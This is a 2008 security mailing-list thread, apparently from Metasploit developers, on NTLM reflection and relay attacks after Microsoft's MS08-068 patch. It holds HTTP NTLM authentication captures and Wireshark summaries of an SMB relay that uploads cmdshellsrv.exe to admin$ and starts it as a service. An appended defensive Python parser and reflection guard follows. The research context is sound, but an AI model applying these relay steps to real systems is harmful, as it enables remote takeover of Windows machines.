ArcSighter Elite wrote:
> ArcSighter Elite wrote:
>> H D Moore wrote:
>>> On Monday 22 December 2008, ArcSighter Elite wrote:
>>>> I came this morning with something. The MS08-67 patch when challenge
>>>> keys couldn't be replayed, affects also the other variants of the
>>>> attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP
>>>> and SMTP versions?
>>> Supposedly it affects any component that initializes the security
>>> negotiation the "right" way, but only during a direct reflection attack.
>>> You can still relay to a third-party host regardless of protocol.
>>> -HD
>>>
>>> _______________________________________________
>>> Framework-Hackers mailing list
>>> Framework-Hackers@spool.metasploit.com
>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>>
>> Well, this is how we go.
>>
>> Before MS08-067:
>>
>> Windows XP SP2 Spanish:
>> I totally owned. HTTP-based. No user intervention. No nothing. KIS2009
>> doesn't block (find-socket).
>> I totally owned SMB-SMB attack, UNC share.
>>
>> After MS08-067:
>> I owned too! But this time I got a prompt asking for username and
>> password; I mean, it doesn't automatically authenticate.
>> The SMB-SMB attack doesn't spawn my shell.
>>
>> Tell me what you think to proceed to XP SP3; although I think I will get
>> the same results.
>
> Sorry about the typo, it is MS08-068 that I've applied, not MS08-067 (netapi).
> It's the right patch, and the results are above.
Well, it surprisingly seems to work also in XP SP3, before and after the patch too. The interesting prompt about username/password authentication was my bad; I don't get a prompt on XP SP3 or on XP SP2 after I rebooted SP2.

Here is what I've done (some hack in Python):

1. Force the browser to authenticate: HTTP 401 + WWW-Authenticate: NTLM

Ex.: (Here *.*.*.1 is the server, *.*.*.2 the client)

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
Host: *.*.*.1
Connection: Keep-Alive

HTTP/1.1 401 Unauthorized
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/6.0
WWW-Authenticate: NTLM
Connection: keep-alive

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
Host: *.*.*.1
Connection: Keep-Alive
Authorization: NTLM TlR********AAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw==    //-- Avoid null sessions

HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/6.0
WWW-Authenticate: NTLM TlR********ABgAGADgAAAAHsgAA+vnrqY91YSEAAAAAAAAAACwALAA+AAAABQEoCgAAAA9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAAAAAA==
Content-Length: 0
Content-Type: text/html

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
Host: *.*.*.1
Connection: Keep-Alive
Authorization: NTLM TlR********AAAAGAAYAHwAAAAYABgAlAAAABQAFABIAAAAGgAaAFwAAAAGAAYAdgAAAAAAAACsAAAABYIAAgUBKAoAAAAPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg==

HTTP/1.1 200 OK
Content-Length: 92
Connection: close

2. The basic replay attack (Wireshark summaries only):

//-- Negotiating
513 10.025748 *.*.*.1 *.*.*.2 SMB Negotiate Protocol Request
516 10.026712 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE
//-- Authenticating
520 10.029566 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_AUTH, User: WS2\Administrador
//-- Accessing IPC$
523 10.034183 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: \\*.*.*.2\IPC$
//-- Accessing admin$
531 10.040157 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: \\*.*.*.2\admin$
//-- Uploading exe file
533 10.041749 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, Path: \cmdshellsrv.exe
//-- Accessing service control manager
561 11.066248 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, FID: 0x4000, Path: \svcctl
//-- well I got tired.

The rest you already know: binding, OpenSCManager, OpenService, StartService => owning!

So please give another point of view, because what I've realized here is that MS didn't fix this properly!

Sincerely.
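An added example, not the poster's "hack in Python" (which the thread never shows): a parser for the NTLM tokens carried in the WWW-Authenticate / Authorization headers above, plus a client-side guard that refuses a CHALLENGE message whose 8-byte challenge this same host has handed out as a server, which is the direct-reflection case HD says the patch covers (a relay to a third-party host leaves no such trace, so the guard does not catch it). Field offsets follow the NTLMSSP Type 2 / Type 3 layouts; the Type 2 sample is constructed here and its flag value is arbitrary.

```python
import base64
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"

def _secbuf(msg: bytes, off: int) -> bytes:
    """Read an NTLM security buffer (len, maxlen, offset) stored at msg[off:off+8]."""
    length, _maxlen, start = struct.unpack_from("<HHI", msg, off)
    return msg[start:start + length]

def parse_ntlm_header(value: str) -> dict:
    """Parse the base64 token after 'NTLM ' in a WWW-Authenticate/Authorization header."""
    msg = base64.b64decode(value.split()[-1])
    if not msg.startswith(NTLMSSP_SIG):
        raise ValueError("not an NTLMSSP message")
    mtype = struct.unpack_from("<I", msg, 8)[0]
    if mtype == 2:  # CHALLENGE (server -> client): the 8-byte nonce sits at offset 24
        return {"type": 2, "target": _secbuf(msg, 12).decode("utf-16-le"),
                "flags": struct.unpack_from("<I", msg, 20)[0], "challenge": msg[24:32]}
    if mtype == 3:  # AUTHENTICATE (client -> server); strings assume the Unicode flag
        return {"type": 3, "domain": _secbuf(msg, 28).decode("utf-16-le"),
                "user": _secbuf(msg, 36).decode("utf-16-le"),
                "workstation": _secbuf(msg, 44).decode("utf-16-le")}
    return {"type": mtype}  # NEGOTIATE or unknown

class ReflectionGuard:
    """Remembers challenges this host issued as a server and refuses to answer one of
    them as a client: that is direct reflection; a relay to a third host is not caught."""

    def __init__(self) -> None:
        self.outstanding = set()

    def server_issued(self, challenge: bytes) -> None:
        self.outstanding.add(challenge)

    def client_may_answer(self, header_value: str) -> bool:
        info = parse_ntlm_header(header_value)
        return info["type"] != 2 or info["challenge"] not in self.outstanding

def build_sample_type2(challenge: bytes, target: str = "WS2") -> str:
    """Constructed sample CHALLENGE header value (not a capture from the thread)."""
    name = target.encode("utf-16-le")
    body = NTLMSSP_SIG + struct.pack("<I", 2)
    body += struct.pack("<HHI", len(name), len(name), 56)  # target name after 56-byte header
    body += struct.pack("<I", 0x00028282)                  # negotiate flags: arbitrary sample
    body += challenge + b"\x00" * 8                         # server challenge + reserved
    body += struct.pack("<HHI", 0, 0, 56 + len(name))       # empty target info buffer
    body += b"\x00" * 8                                     # version field
    return "NTLM " + base64.b64encode(body + name).decode()
```

Feeding the real Type 2 and Type 3 tokens from the exchange above into parse_ntlm_header would recover the server challenge and the WS2\Administrador user and workstation names that the Wireshark summary later shows on the SMB side.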